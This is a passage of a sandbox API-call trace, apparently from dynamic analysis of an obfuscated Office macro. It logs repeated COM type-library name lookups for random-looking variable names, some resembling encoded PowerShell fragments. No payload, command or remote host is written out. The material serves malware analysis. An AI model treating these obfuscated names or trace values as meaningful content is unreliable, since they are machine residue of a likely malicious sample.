lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="MAQQkQAc") returned 9 [0068.418] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.418] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="MAQQkQAc", lHashVal=0x1014e7, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.419] IUnknown:Release (This=0x665ba50) returned 0xb [0068.419] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.419] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="MAQQkQAc", lHashVal=0x1014e7, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.419] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.419] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.419] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="MAQQkQAc", lHashVal=0x1014e7, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.419] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.419] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.419] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="MAQQkQAc", lHashVal=0x1014e7, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.419] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2406, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="MAQQkQAc") returned 9 [0068.419] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="MAQQkQAc", lHashVal=0x1014e7, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.419] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d60 [0068.419] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x9, _Src=0x3ba2406 | out: _Dst=0x67c2d60) returned 0x0 [0068.419] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MAQQkQAc") returned 0x10dd2e [0068.419] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_MAQQkQAc" | out: _Dst="_B_var_MAQQkQAc") returned 0x0 [0068.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_MAQQkQAc") returned 16 [0068.419] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.419] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_MAQQkQAc", lHashVal=0x10dd2e, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.419] IUnknown:Release (This=0x665ba50) returned 0xb [0068.419] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.419] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_MAQQkQAc", lHashVal=0x10dd2e, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.419] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.419] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.419] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_MAQQkQAc", lHashVal=0x10dd2e, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.419] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.420] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.420] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_MAQQkQAc", lHashVal=0x10dd2e, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.420] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.420] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.420] IUnknown:Release (This=0x665ba50) returned 0xb [0068.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc17ea, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_MAQQkQAc") returned 16 [0068.420] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_MAQQkQAc", lHashVal=0x10dd2e, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x4d005f00720061, ppTypeComp=0x6b005100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x4d005f00720061, ppTypeComp=0x6b005100000000, pDummy=0x0) returned 0x0 [0068.420] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba2406 | out: _Dst=0x145020) returned 0x0 [0068.420] ITypeComp:RemoteBind (in: This=0x665ba60, szName="JABkACAU", lHashVal=0x104fbc, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2432, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="JABkACAU") returned 9 [0068.420] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="JABkACAU", lHashVal=0x104fbc, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2432, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="JABkACAU") returned 9 [0068.420] ITypeComp:RemoteBind (in: This=0x665bd30, szName="JABkACAU", lHashVal=0x104fbc, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.420] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JABkACAU") returned 0x104fbc [0068.420] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="JABkACAU" | out: _Dst="JABkACAU") returned 0x0 [0068.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="JABkACAU") returned 9 [0068.420] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.420] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="JABkACAU", lHashVal=0x104fbc, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.420] IUnknown:Release (This=0x665ba50) returned 0xb [0068.420] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.421] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="JABkACAU", lHashVal=0x104fbc, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.421] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.421] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.421] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="JABkACAU", lHashVal=0x104fbc, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.421] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.421] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.421] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="JABkACAU", lHashVal=0x104fbc, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.421] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2432, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="JABkACAU") returned 9 [0068.421] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="JABkACAU", lHashVal=0x104fbc, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.421] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d60 [0068.421] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x9, _Src=0x3ba2432 | out: _Dst=0x67c2d60) returned 0x0 [0068.421] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_JABkACAU") returned 0x102745 [0068.421] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_JABkACAU" | out: _Dst="_B_var_JABkACAU") returned 0x0 [0068.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_JABkACAU") returned 16 [0068.421] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.421] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_JABkACAU", lHashVal=0x102745, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.421] IUnknown:Release (This=0x665ba50) returned 0xb [0068.421] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.421] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_JABkACAU", lHashVal=0x102745, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.421] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.421] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.421] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_JABkACAU", lHashVal=0x102745, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.421] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.421] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.422] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_JABkACAU", lHashVal=0x102745, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.422] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.422] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.422] IUnknown:Release (This=0x665ba50) returned 0xb [0068.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc181a, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_JABkACAU") returned 16 [0068.422] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_JABkACAU", lHashVal=0x102745, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x4a005f00720061, ppTypeComp=0x41006b00000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x4a005f00720061, ppTypeComp=0x41006b00000000, pDummy=0x0) returned 0x0 [0068.422] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba2432 | out: _Dst=0x145020) returned 0x0 [0068.422] ITypeComp:RemoteBind (in: This=0x665ba60, szName="MQAGB4A", lHashVal=0x1081e5, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2486, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="MQAGB4A") returned 8 [0068.422] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="MQAGB4A", lHashVal=0x1081e5, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2486, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="MQAGB4A") returned 8 [0068.422] ITypeComp:RemoteBind (in: This=0x665bd30, szName="MQAGB4A", lHashVal=0x1081e5, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.422] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MQAGB4A") returned 0x1081e5 [0068.422] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="MQAGB4A" | out: _Dst="MQAGB4A") returned 0x0 [0068.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="MQAGB4A") returned 8 [0068.422] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.422] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="MQAGB4A", lHashVal=0x1081e5, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.422] IUnknown:Release (This=0x665ba50) returned 0xb [0068.422] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.422] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="MQAGB4A", lHashVal=0x1081e5, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.422] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.422] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.423] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="MQAGB4A", lHashVal=0x1081e5, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.423] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.423] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.423] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="MQAGB4A", lHashVal=0x1081e5, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.423] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2486, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="MQAGB4A") returned 8 [0068.423] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="MQAGB4A", lHashVal=0x1081e5, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.423] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d60 [0068.423] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x8, _Src=0x3ba2486 | out: _Dst=0x67c2d60) returned 0x0 [0068.423] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MQAGB4A") returned 0x108569 [0068.423] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_MQAGB4A" | out: _Dst="_B_var_MQAGB4A") returned 0x0 [0068.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_MQAGB4A") returned 15 [0068.423] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.423] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_MQAGB4A", lHashVal=0x108569, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.423] IUnknown:Release (This=0x665ba50) returned 0xb [0068.423] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.423] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_MQAGB4A", lHashVal=0x108569, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.423] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.423] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.423] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_MQAGB4A", lHashVal=0x108569, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.423] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.423] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.423] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_MQAGB4A", lHashVal=0x108569, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.423] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.423] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.423] IUnknown:Release (This=0x665ba50) returned 0xb [0068.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc184a, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_MQAGB4A") returned 15 [0068.423] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_MQAGB4A", lHashVal=0x108569, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x4d005f00720061, ppTypeComp=0x42004700000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x4d005f00720061, ppTypeComp=0x42004700000000, pDummy=0x0) returned 0x0 [0068.424] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba2486 | out: _Dst=0x145020) returned 0x0 [0068.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba245e, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="SxGZDCB") returned 8 [0068.424] ITypeComp:RemoteBind (in: This=0x665ba60, szName="SxGZDCB", lHashVal=0x10c369, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba245e, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="SxGZDCB") returned 8 [0068.424] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="SxGZDCB", lHashVal=0x10c369, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba245e, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="SxGZDCB") returned 8 [0068.424] ITypeComp:RemoteBind (in: This=0x665bd30, szName="SxGZDCB", lHashVal=0x10c369, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.424] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SxGZDCB") returned 0x10c369 [0068.424] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="SxGZDCB" | out: _Dst="SxGZDCB") returned 0x0 [0068.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="SxGZDCB") returned 8 [0068.424] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.424] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="SxGZDCB", lHashVal=0x10c369, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.424] IUnknown:Release (This=0x665ba50) returned 0xb [0068.424] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.424] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="SxGZDCB", lHashVal=0x10c369, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.424] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.424] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.424] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="SxGZDCB", lHashVal=0x10c369, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.424] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.424] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.424] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="SxGZDCB", lHashVal=0x10c369, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.425] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba245e, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="SxGZDCB") returned 8 [0068.425] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="SxGZDCB", lHashVal=0x10c369, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.425] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d60 [0068.425] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x8, _Src=0x3ba245e | out: _Dst=0x67c2d60) returned 0x0 [0068.425] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_SxGZDCB") returned 0x10b76c [0068.425] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_SxGZDCB" | out: _Dst="_B_var_SxGZDCB") returned 0x0 [0068.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_SxGZDCB") returned 15 [0068.425] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.425] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_SxGZDCB", lHashVal=0x10b76c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.425] IUnknown:Release (This=0x665ba50) returned 0xb [0068.425] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.425] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_SxGZDCB", lHashVal=0x10b76c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.425] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.425] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.425] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_SxGZDCB", lHashVal=0x10b76c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.425] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.425] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.425] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_SxGZDCB", lHashVal=0x10b76c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.425] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.425] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.425] IUnknown:Release (This=0x665ba50) returned 0xb [0068.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc187a, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_SxGZDCB") returned 15 [0068.425] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_SxGZDCB", lHashVal=0x10b76c, wFlags=0x5, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x53005f00720061, ppTypeComp=0x44005a00000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x53005f00720061, ppTypeComp=0x44005a00000000, pDummy=0x0) returned 0x0 [0068.425] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba245e | out: _Dst=0x145020) returned 0x0 [0068.425] ITypeComp:RemoteBind (in: This=0x665ba60, szName="AGDBwAwA", lHashVal=0x1003df, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, 